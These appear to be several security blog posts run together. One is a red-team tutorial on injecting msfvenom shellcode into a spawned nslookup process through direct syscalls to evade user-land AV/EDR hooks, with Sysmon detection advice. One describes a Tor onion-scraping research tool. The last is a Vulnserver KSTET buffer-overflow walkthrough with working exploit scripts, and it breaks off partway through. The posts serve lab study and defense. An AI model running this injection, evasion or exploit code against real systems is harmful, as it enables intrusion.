This is where the fun really starts. To this point, we’ve used the Windows High-Level MSDN Documented methods of accessing process memory, changing process memory, and creating a remote thread within an external process. Next, we went one step lower and manually mapped the Nt* functions residing within ntdll.dll to our program and called them directly. Now, we’re going to completely remove any Windows DLL imports and manually conduct the syscalls with our own custom assembly rather than having ntdll.dll or kernelbase.dll do it for us.

I’ve used a tool called SysWhispers to generate both the header file (common.h) and the x86 assembly file (common.asm). I followed the repository’s instructions on how to load both files into the Visual Studio C++ project and then compiled common.asm and included the common.h header.

#include <iostream>
#include <Windows.h>
#include "common.h"


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";


    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;
    
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 


    // Inject into the 64-bit process:
    // SYSWHISPER LOW-LEVEL UNDOCUMENTED API:
    allocation_start = nullptr;
    NtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    NtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
    NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, pi.hProcess, allocation_start, allocation_start, FALSE, NULL, NULL, NULL, NULL);
}

Let’s go through exactly how this works. First, common.asm contains the proper Windows syscall integer values for many of the undocumented Windows functions. It not only maps each function name to the proper syscall integer, it also takes the OS version into account, since syscall values change between Windows releases. Let’s take a look at the NtAllocateVirtualMemory() syscall assembly that SysWhispers generated for us.

NtAllocateVirtualMemory PROC
	mov rax, gs:[60h]                                 ; Load PEB into RAX.
NtAllocateVirtualMemory_Check_X_X_XXXX:               ; Check major version.
	cmp dword ptr [rax+118h], 6
	je  NtAllocateVirtualMemory_Check_6_X_XXXX
	cmp dword ptr [rax+118h], 10
	je  NtAllocateVirtualMemory_Check_10_0_XXXX
	jmp NtAllocateVirtualMemory_SystemCall_Unknown
NtAllocateVirtualMemory_Check_6_X_XXXX:               ; Check minor version for Windows Vista/7/8.
	cmp dword ptr [rax+11ch], 1
	je  NtAllocateVirtualMemory_Check_6_1_XXXX
	cmp dword ptr [rax+11ch], 2
	je  NtAllocateVirtualMemory_SystemCall_6_2_XXXX
	cmp dword ptr [rax+11ch], 3
	je  NtAllocateVirtualMemory_SystemCall_6_3_XXXX
	jmp NtAllocateVirtualMemory_SystemCall_Unknown
NtAllocateVirtualMemory_Check_6_1_XXXX:               ; Check build number for Windows 7.
	cmp dword ptr [rax+120h], 7600
	je  NtAllocateVirtualMemory_SystemCall_6_1_7600
	cmp dword ptr [rax+120h], 7601
	je  NtAllocateVirtualMemory_SystemCall_6_1_7601
	jmp NtAllocateVirtualMemory_SystemCall_Unknown
NtAllocateVirtualMemory_Check_10_0_XXXX:              ; Check build number for Windows 10.
	cmp dword ptr [rax+120h], 10240
	je  NtAllocateVirtualMemory_SystemCall_10_0_10240
	cmp dword ptr [rax+120h], 10586
	je  NtAllocateVirtualMemory_SystemCall_10_0_10586
	cmp dword ptr [rax+120h], 14393
	je  NtAllocateVirtualMemory_SystemCall_10_0_14393
	cmp dword ptr [rax+120h], 15063
	je  NtAllocateVirtualMemory_SystemCall_10_0_15063
	cmp dword ptr [rax+120h], 16299
	je  NtAllocateVirtualMemory_SystemCall_10_0_16299
	cmp dword ptr [rax+120h], 17134
	je  NtAllocateVirtualMemory_SystemCall_10_0_17134
	cmp dword ptr [rax+120h], 17763
	je  NtAllocateVirtualMemory_SystemCall_10_0_17763
	cmp dword ptr [rax+120h], 18362
	je  NtAllocateVirtualMemory_SystemCall_10_0_18362
	cmp dword ptr [rax+120h], 18363
	je  NtAllocateVirtualMemory_SystemCall_10_0_18363
	jmp NtAllocateVirtualMemory_SystemCall_Unknown
NtAllocateVirtualMemory_SystemCall_6_1_7600:          ; Windows 7 SP0
	mov eax, 0015h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_6_1_7601:          ; Windows 7 SP1 and Server 2008 R2 SP0
	mov eax, 0015h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_6_2_XXXX:          ; Windows 8 and Server 2012
	mov eax, 0016h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_6_3_XXXX:          ; Windows 8.1 and Server 2012 R2
	mov eax, 0017h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_10240:        ; Windows 10.0.10240 (1507)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_10586:        ; Windows 10.0.10586 (1511)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_14393:        ; Windows 10.0.14393 (1607)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_15063:        ; Windows 10.0.15063 (1703)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_16299:        ; Windows 10.0.16299 (1709)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_17134:        ; Windows 10.0.17134 (1803)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_17763:        ; Windows 10.0.17763 (1809)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_18362:        ; Windows 10.0.18362 (1903)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_10_0_18363:        ; Windows 10.0.18363 (1909)
	mov eax, 0018h
	jmp NtAllocateVirtualMemory_Epilogue
NtAllocateVirtualMemory_SystemCall_Unknown:           ; Unknown/unsupported version.
	ret
NtAllocateVirtualMemory_Epilogue:
	mov r10, rcx
	syscall
	ret
NtAllocateVirtualMemory ENDP

Depending on the OS version, the NtAllocateVirtualMemory instructions load the correct syscall integer value into the EAX register. Next, execution jumps to NtAllocateVirtualMemory_Epilogue, which makes the syscall. The Windows version that I am developing on is Windows 10.0.17763 (1809), which means the proper syscall value for NtAllocateVirtualMemory is 0x18, or decimal 24. And just to double check, we can look at a table that details all the functions and syscall values subject to OS Version here.
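The version dispatch in the listing can be read as a simple lookup table. The Python sketch below mirrors only the Windows 10 build-to-number mapping shown above for NtAllocateVirtualMemory. The names SYSCALL_BY_BUILD and syscall_number are made up for illustration, and the values are copied from the listing, not queried from a live system.

```python
# Windows 10 build number -> NtAllocateVirtualMemory syscall number.
# Values are copied from the SysWhispers listing above; the names are illustrative.
SYSCALL_BY_BUILD = {
    10240: 0x18, 10586: 0x18, 14393: 0x18, 15063: 0x18, 16299: 0x18,
    17134: 0x18, 17763: 0x18, 18362: 0x18, 18363: 0x18,
}


def syscall_number(build):
    """Return the syscall number for a listed Windows 10 build, or None if unlisted."""
    return SYSCALL_BY_BUILD.get(build)


number = syscall_number(17763)
print(hex(number), number)  # 0x18 24
```

An unlisted build returns None here, which corresponds to the Unknown branch in the assembly.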

Let’s look at this in a debugger. I set a breakpoint on NtAllocateVirtualMemory within the C++ source. Once I hit that breakpoint, I step through the common.asm instructions until the EAX register is updated, which means an OS version match was found and the syscall integer value was loaded into EAX (the lower 32 bits of RAX).

NOTE: If you’re not sure how x86 and x86_64 registers correlate to each other, here is a fantastic graphic that details all the registers:

How x86 registers fit into x86_64 registers
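The EAX/RAX relationship can also be shown with plain integer masking. This is a small Python sketch, not debugger output. The starting RAX value is a made-up stand-in for the PEB pointer, and the function names are illustrative. It relies on the x86-64 rule that writing a 32-bit register zero-extends into the full 64-bit register.

```python
MASK32 = 0xFFFFFFFF


def read_eax(rax):
    """EAX is the lower 32 bits of RAX."""
    return rax & MASK32


def write_eax(value):
    """On x86-64, a write to EAX clears the upper 32 bits of RAX."""
    return value & MASK32


rax = 0x000000A1B2C3D000          # hypothetical PEB address left in RAX by mov rax, gs:[60h]
print(hex(read_eax(rax)))         # lower half only: 0xb2c3d000
rax = write_eax(0x18)             # mov eax, 0018h
print(hex(rax))                   # 0x18, upper half is now zero
```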

As expected, we’ve matched one of the OS Version values and the EAX register is set to 0x18. Next, we jump to the epilogue to execute the NtAllocateVirtualMemory syscall. Keep in mind, we did not load any external functions to help us execute this syscall. We directly issued this syscall.

Direct Syscall observed in the Visual Studio Debugger

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Number of API Calls	288
Total Amount of Memory Used	186 KB

API Monitor Analysis of Low-Level Direct Syscalls

We don’t see ANY of the standard API calls we saw with the High-Level and Medium-Level API calls. That’s because we did not load any external resources to conduct the syscall. But the syscall still happened, and we can confirm that by reviewing the Sysmon event logs. Remember, Sysmon’s hooking runs in Kernel-Land (SYSTEM) and, as such, we can’t really hide from it unless we disable it (which requires admin).

Sysmon Analysis

Once again, Sysmon was able to hook and log the five (5) events.

Conclusion

Red Team

The lower we can go, the better. We can evade AV / EDR systems that hook in User-Land and do all kinds of fancy things by rolling our own syscalls. Mixing this technique with a plethora of others such as Arbitrary Code Guard, off-binary payload ingestion, etc. can allow us to operate with less noise as well as arm Blue Team with new detection capabilities.

Blue Team

Use Sysmon! As we saw, the Sysmon driver was able to hook all of our remote thread activity. This is a Free tool with several features that should be rolled into your detection processes. For more information:

Black Hills Information Security Blog – Getting Started with Sysmon
Black Hills Information Security Webcast – Implementing Sysmon and Applocker
ion-storm’s excellent (starter) Sysmon Config


Hunting Onions – A Framework for Simple Darknet Analysis

Sevro Security

Joshua

8 February 2020 at 18:12


One of the things I spend a lot of time doing is researching the current threat landscape. I dedicate a lot of time to pulling samples from Virus Total, reversing, analyzing, and searching for known/unknown IOCs everywhere I can in order to properly mimic a threat actor. One of the places I search happens to be Tor (AKA: the darknet). My method for connecting to Tor varies, and this post is not about how to stay safe and avoid data leakage. Rather, it’s to demonstrate a novel approach to obtaining .Onion addresses and analyzing them in a safe and efficient manner.

TL;DR: A full listing of classes and functions is detailed within the Github Wiki.

How Onion Hunter Works

NOTE: Onion Hunter does not download images, malware, full site source code, etc. This is to protect the user and the system that is running the analysis. There’s a ton of bad things that can easily get you into trouble and for that reason alone, only the HTML of the page in question is analyzed and nothing more.

Onion-Hunter is a Python3 based framework that analyzes Onion site source code for user defined keywords and stores relevant data to a SQLite3 backend. Currently, the framework utilizes several sources to aggregate Onion addresses:

Reddit subreddits: A predefined set of subreddits is populated within config.py, and each one is scraped for Onion addresses.
Tor Deep Paste: This has turned out to be a very good source.
Fresh Onions Sources: Each onion address is analyzed to determine if it’s a fresh onion source (i.e., contains new/mapped onions) and if so, is saved to the FRESH_ONION_SOURCES table.
Additional_onions.txt: Any tertiary onion address, that is any address found that is not immediately analyzed, is saved to docs/additional_onions.txt for later analysis.

A researcher can also analyze an individual Onion address, or a text file filled with Onion addresses, if they happen to come upon something interesting that warrants analysis and categorization.

Once valid .Onion addresses have been found, they’re analyzed by issuing a GET request to the .Onion address and searching the index source (HTML) for keywords that are predefined by the researcher.
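The keyword step can be pictured with a few lines of Python. This is only a sketch of the idea, not Onion-Hunter’s actual code. The function name keyword_matches is hypothetical, and the case-insensitive comparison is an assumption. It works on HTML that has already been retrieved, so no network access is involved.

```python
def keyword_matches(html, keywords):
    """Return the keywords that appear in the page source (case-insensitive, an assumption)."""
    lowered = html.lower()
    return [kw for kw in keywords if kw.lower() in lowered]


page = "<html><title>Hacker forum</title><body>Nothing else here</body></html>"
matches = keyword_matches(page, ["Hacker", "Flawwedammy"])
print(matches, len(matches))  # ['Hacker'] 1
```

The list and its length map naturally onto the KEYWORD_MATCHES and KEYWORD_MATCHES_SUM columns described in the database section.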

The Database

A SQLite3 backend is used to maintain records of all analyzed Onion addresses as well as a record of all Onions that have been categorized as probable Fresh Onion Domains. There are a total of three (3) tables that are used:

ONIONS – Contains all Onion addresses observed and is by far, the most interesting table for analysis.
FRESH_ONION_SOURCES – Any onion address that has 50+ unique addresses listed on the front page and also includes fresh onion keywords is categorized as a probable Fresh Onion Domain and saved to this table.
KNOWN_ONIONS – This table is currently unused. It was designed for reporting purposes. That is, if for any reason you want to conduct analysis on weekly/monthly trends (for example), attributes of previously analyzed Onions can be added to this table to avoid duplication in reporting.
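The Fresh Onion rule described for FRESH_ONION_SOURCES (50+ unique addresses plus a keyword hit) can be sketched as follows. The regular expression, the function names, and the example keyword are assumptions made for illustration. Only the threshold of 50 comes from the description above.

```python
import re

# Matches v3 (56 character) or v2 (16 character) base32 onion hostnames.
ONION_RE = re.compile(r"\b(?:[a-z2-7]{56}|[a-z2-7]{16})\.onion\b")


def unique_onions(html):
    """Collect the distinct onion hostnames found in the page source."""
    return {m.group(0) for m in ONION_RE.finditer(html.lower())}


def is_probable_fresh_source(html, fresh_keywords, threshold=50):
    """True when the page lists at least `threshold` unique onions and mentions a keyword."""
    lowered = html.lower()
    has_keyword = any(kw.lower() in lowered for kw in fresh_keywords)
    return has_keyword and len(unique_onions(html)) >= threshold


# Build a synthetic page with 50 distinct, made-up 16 character hostnames.
alphabet = "abcdefghijklmnopqrstuvwxyz234567"
hosts = ["a" * 14 + alphabet[i // 32] + alphabet[i % 32] + ".onion" for i in range(50)]
page = "fresh onions: " + " ".join(hosts)
print(is_probable_fresh_source(page, ["fresh onions"]))  # True
```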

CREATE TABLE ONIONS
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
DATE_FOUND TEXT NOT NULL,
DOMAIN_SOURCE TEXT NOT NULL,
URI TEXT NOT NULL,
URI_TITLE TEXT,
DOMAIN_HASH TEXT NOT NULL,
KEYWORD_MATCHES TEXT,
KEYWORD_MATCHES_SUM INT,
INDEX_SOURCE TEXT NOT NULL);

CREATE TABLE FRESH_ONION_SOURCES
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
URI TEXT NOT NULL,
DOMAIN_HASH TEXT NOT NULL,
FOREIGN KEY (DOMAIN_HASH) REFERENCES ONIONS (DOMAIN_HASH));

CREATE TABLE KNOWN_ONIONS
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
DOMAIN_HASH TEXT NOT NULL,
DATE_REPORTED TEXT,
REPORTED INT NOT NULL,
FOREIGN KEY (DOMAIN_HASH) REFERENCES ONIONS (DOMAIN_HASH));
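To make the schema concrete, here is a minimal sketch that creates the ONIONS table in an in-memory database, stores one record, and queries it back. The helper add_onion, the comma-joined KEYWORD_MATCHES format, and the use of SHA-256 for DOMAIN_HASH are assumptions for illustration. The framework’s real hashing and storage code may differ.

```python
import hashlib
import sqlite3
from datetime import date

conn = sqlite3.connect(":memory:")  # throwaway database for the example
conn.execute("""
    CREATE TABLE ONIONS
    (ID INTEGER PRIMARY KEY AUTOINCREMENT,
    DATE_FOUND TEXT NOT NULL,
    DOMAIN_SOURCE TEXT NOT NULL,
    URI TEXT NOT NULL,
    URI_TITLE TEXT,
    DOMAIN_HASH TEXT NOT NULL,
    KEYWORD_MATCHES TEXT,
    KEYWORD_MATCHES_SUM INT,
    INDEX_SOURCE TEXT NOT NULL)
""")


def add_onion(conn, source, uri, title, matches, html):
    """Insert one analyzed onion; SHA-256 of the URI is an assumed DOMAIN_HASH."""
    domain_hash = hashlib.sha256(uri.encode("utf-8")).hexdigest()
    conn.execute(
        "INSERT INTO ONIONS (DATE_FOUND, DOMAIN_SOURCE, URI, URI_TITLE, DOMAIN_HASH, "
        "KEYWORD_MATCHES, KEYWORD_MATCHES_SUM, INDEX_SOURCE) VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
        (date.today().isoformat(), source, uri, title, domain_hash,
         ",".join(matches), len(matches), html),
    )
    conn.commit()


add_onion(conn, "reddit", "http://exampleexampleex.onion", "Example",
          ["Hacker"], "<html>Hacker</html>")
rows = conn.execute(
    "SELECT URI, KEYWORD_MATCHES_SUM FROM ONIONS WHERE KEYWORD_MATCHES_SUM > 0"
).fetchall()
print(rows)
```

Parameterized queries (the ? placeholders) keep scraped page content from being interpreted as SQL.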

An example of what the data looks like within the ONIONS table can be seen in the image below. For simply viewing the data, I like to use DB Browser for SQLite. However, all heavy operations should be done in code as this application can be very clunky.

Viewing the Onions table within DB Browser

User Configuration

As stated above, the only method of domain/site analysis is by a simple keyword search. A user must supply the following within the src/config.py:

class configuration:

    def __init__(self):
        # Reddit API Variables
        self.r_username = ""
        self.r_password = ""
        self.r_client_id = ""
        self.r_client_secret = ""
        self.r_user_agent = ""

        # Reddit SubReddits to Search:
        self.sub_reddits = ["onions", "deepweb", "darknet", "tor", "conspiracy", "privacy", "vpn", "deepwebintel",
                            "emailprivacy", "drugs", "blackhat", "HowToHack", "netsec", "hacking",
                            "blackhatunderground", "blackhats", "blackhatting", "blackhatexploits",
                            "reverseengineering"]

        # Keywords to Search each Onions Address for.
        ## Searches the .onion source code retrieved via an HTTP GET request.
        self.keywords = ["Hacker", "Flawwedammy"]

Improvements

There are a lot of improvements that can be made to the current version and I intend on making some of these changes in 2020. For example, I would like to utilize the DuckDuckGo API as well as Reddit to start the initial searching. There may also be reliable sources that keep tabs on Fresh Onion databases that are active on Tor. These information sources would be more reliable going forward.

Other improvements such as database optimization, site categorization, and user-defined analysis techniques are slotted as well.


Vulnserver KSTET Socket Re-use

Sevro Security

Joshua

20 November 2019 at 23:21


In a previous post, Vulnserver KSTET Egg Hunter, we looked at how we can use an egghunter to obtain code execution within a larger chunk of memory. In this post, we will look at the WS2_32.dll recv() function used by the KSTET command and how we can re-use it to pull in a larger chunk of shellcode within a buffer we allocate ourselves. In regards to Vulnserver.exe, the recv() function is used anytime we send data to the socket. The server then parses the data and decides what to do with it.

Prerequisites:

Vulnserver.exe
Immunity or Ollydbg – I will be using Immunity
Mona.py
Windows VM – I am using a Windows XP Professional host

Resources:

I’m going to skip some of the set-up assuming you understand how to attach a debugger to a process or start a process within a debugger. If you don’t, go ahead and read some of my other buffer overflow tutorials.

The Crash

Part of why I decided to build this tutorial is because I am currently studying for the OSCE. As such, we are going to use the Spike Fuzzer (native in Kali) to fuzz the VulnServer.exe application and, just like the egg hunter tutorial, we will be fuzzing the KSTET parameter. Here is our Spike Fuzzing template (kstet.spk):

s_readline();
s_string("KSTET ");
s_string_variable("0");
s_string("\r\n");
s_readline();

The VulnServer listens on port 9999 and is residing at an IP Address: 192.168.5.130. So, our Spike Fuzzer syntax will be:

generic_send_tcp 192.168.5.130 9999 kstet.spk 0 0

During any fuzzing, it’s a good idea to keep a WireShark instance running in the background so you can manually analyze the packets if a crash occurs.

After less than 2 seconds, we have a visible crash that looks to have overwritten EIP and EBP.

Looking at Wireshark we see that the last valid connection contained the following data:

Buffer Overflow Standard Steps

This is the repetitive part of any Buffer Overflow:

Determine the offset in which we overwrote EIP.
Find a JMP ESP Instruction we can use.
Overwrite EIP with the JMP ESP address and control the execution flow.

Determine Offset:

We create a standard pattern using the Metasploit Framework’s pattern_create.rb. This generates a unique string n bytes long that is used to determine the actual offset of the overwrite. The syntax for the ruby script is:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
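For readers curious about what the pattern looks like under the hood, here is a rough Python equivalent of the idea. It is a sketch, not the Metasploit implementation, and the function names are my own. Each three-character group (uppercase, lowercase, digit) appears once, so any four consecutive characters identify a single position in the string.

```python
import string
import struct
from itertools import product


def pattern_create(length):
    """Build an Aa0Aa1Aa2... style pattern of the requested length."""
    chunks = []
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase,
                                       string.digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pattern, register_value):
    """Find where a 32-bit register value (little-endian in memory) sits in the pattern."""
    needle = struct.pack("<I", register_value).decode("ascii")
    return pattern.find(needle)


pattern = pattern_create(500)
print(pattern[:20])                          # Aa0Aa1Aa2Aa3Aa4Aa5Aa
print(pattern_offset(pattern, 0x41306241))   # bytes "Ab0A" -> 30
```

The register value is packed as little-endian because that is how x86 stores the four pattern bytes that ended up in EIP.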

Build a Python proof of concept to crash the application similar to the Spike Fuzzer:

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

pattern = ("""Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq""")

buf = ""
buf += "KSTET /.:/"
buf += pattern
buf += "\r\n"

s.send(buf)

We send the payload, overwrite EIP with the pattern, and can now determine the proper offset.

After we have the correct offset, we can build a proof of concept that shows two things:

We have control of EIP and therefore have control of code execution
How much space after the overwrite we have to play with (i.e. store our shellcode)

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

buf = ""
buf += "KSTET /.:/"
buf += "A" * 66
buf += "B" * 4
buf += "C" * 500
buf += "\r\n"

s.send(buf)

Analysis of the Stack after the overflow

We control EIP and we only have 0x10 Bytes of room for shellcode. That’s not enough for anything. However, we have 0x44 Bytes above ESP that we can use to build something useful. In the previous KSTET tutorial, we used this space for an egg-hunter. Now, we are going to build our own shellcode to re-use the WS2_32.recv() function.

Find JMP ESP:

I personally like to use Mona.py with Immunity Debugger to help determine a valid JMP ESP. There are tons of ways to find a proper JMP ESP address, this one just fits my needs.

Verify we have EIP Control:

Set a breakpoint at the JMP ESP address you selected. Amend your Python script to include the JMP ESP address as the EIP overwrite and verify you now hit the JMP ESP address and get back to your code (in this case, the C’s).

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

buf = ""
buf += "KSTET /.:/"
buf += "A" * 66
buf += JMP_ESP
buf += "C" * 500
buf += "\r\n"

s.send(buf)
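A quick aside on the struct.pack call used for JMP_ESP in the script above. x86 is little-endian, so the address has to be written into the buffer with its bytes reversed. The sketch below shows the byte order using the explicit "<I" format. The scripts in this post use "I", which follows the byte order of the machine running the script and gives the same result on a little-endian host.

```python
import struct

address = 0x625011C7

packed = struct.pack("<I", address)          # explicit little-endian, 4 bytes
print(packed.hex())                          # c7115062
print(hex(struct.unpack("<I", packed)[0]))   # 0x625011c7, round trip
```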

A Short Jump

In order to get more room to build our custom shellcode, we need to make a short jump to the top of the A’s. In the start of this tutorial, I posted a link describing the JMP SHORT instructions. Basically, these are two (2) byte instructions that will help us move around in memory without taking up a shit ton of space.

In this case, we want to get to address 0x00B8F9C6. An easy way to build the shellcode is write the instructions directly within Immunity by hitting the space bar and typing in the assembly.

As you can see from the blue text on the left of the Assembly instructions, our opcode is going to be \xEB\xB8. We can simply add this into our Python script and verify we have in fact jumped backwards to our required address.

import socket
import struct
import time

IP = "192.168.5.130"
PORT = 9999
EIP_OFFSET = 66
JMP_ESP = struct.pack("I", 0x625011C7)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print(s.recv(2096))

buf = ""
buf += "KSTET /.:/"
buf += "A" * 66
buf += JMP_ESP
buf += "\xEB\xB8"               # JMP SHORT
buf += "C" * 500
buf += "\r\n"

s.send(buf)
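The two bytes \xEB\xB8 used above decode as a JMP SHORT opcode (0xEB) followed by a signed 8-bit displacement. The sketch below works through that arithmetic. The function names and the example instruction address 0x1000 are made up for illustration and are not taken from the debugger session.

```python
def rel8(byte):
    """Interpret one byte as a signed 8-bit displacement."""
    return byte - 0x100 if byte & 0x80 else byte


def short_jump_target(instruction_address, encoded):
    """Target of a 2-byte JMP SHORT: address of the next instruction plus displacement."""
    if len(encoded) != 2 or encoded[0] != 0xEB:
        raise ValueError("not a 2-byte JMP SHORT")
    return (instruction_address + 2 + rel8(encoded[1])) & 0xFFFFFFFF


print(rel8(0xB8))                                      # -72
print(hex(short_jump_target(0x1000, b"\xEB\xB8")))     # 0xfba
```

The displacement is counted from the end of the jump instruction, which is why 2 is added before applying the offset.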

WS2_32.recv() Review

Before we dig into writing custom shellcode, let’s analyze what is happening locally when recv() is called in the non-altered code. Let’s also define some terms and parameters that are necessary to understand before we get to the exploit.

The recv() function is part of the winsock.h header and takes a total of 4 parameters:

SOCKET – This is a Socket Descriptor and defines a valid socket. It’s dynamic and changes each time the binary/exe is run.
*buf – A pointer in memory where we want to start storing what is received from the socket connection.
len – The size of the buffer in Bytes
flags – Will always be set to 0 in our case. We essentially do not use this but need it to complete the function call.

Three (3) of the four (4) parameters can be generated by us, the attacker. We easily make up our own values, push them onto the stack and have a good ol’ day. But, the SOCKET descriptor is the odd man/woman out. This is set dynamically, by the program. It is, however, set predictably and as such we can analyze a live recv() call in action and find where it’s obtaining the SOCKET descriptor from. Once we know where it comes from, we can dynamically pull that value in with our custom shellcode to make our recv() call as legitimate as the original.

Analyze a Legitimate recv():

In your debugger, start a fresh run of vulnserver.exe and put it into a running state. To make sure the debugger (olly or immunity) has analyzed the code properly, hit CTRL+A. This will tell the debugger to analyze the assembly and point out any objective function calls. With this analyzed, look for the recv() function call.

From left to right, the first picture is where the recv() function is called within the program. The second picture is where we land when the CALL is executed. The address in the second image, 0x0040252C, is very important as that is the address we will CALL at the very end of our custom shellcode.

Next, let’s place a breakpoint at the CALL shown in the first image (leftmost image), and execute our overflow python script so we can observe the legitimate recv() function call.

When the python script is executed, we hit our breakpoint and can view the recv() parameters cleanly located on the stack for us.

Analysis of a valid WS2_32.recv function call

SOCKET DESCRIPTOR = 0x00000080
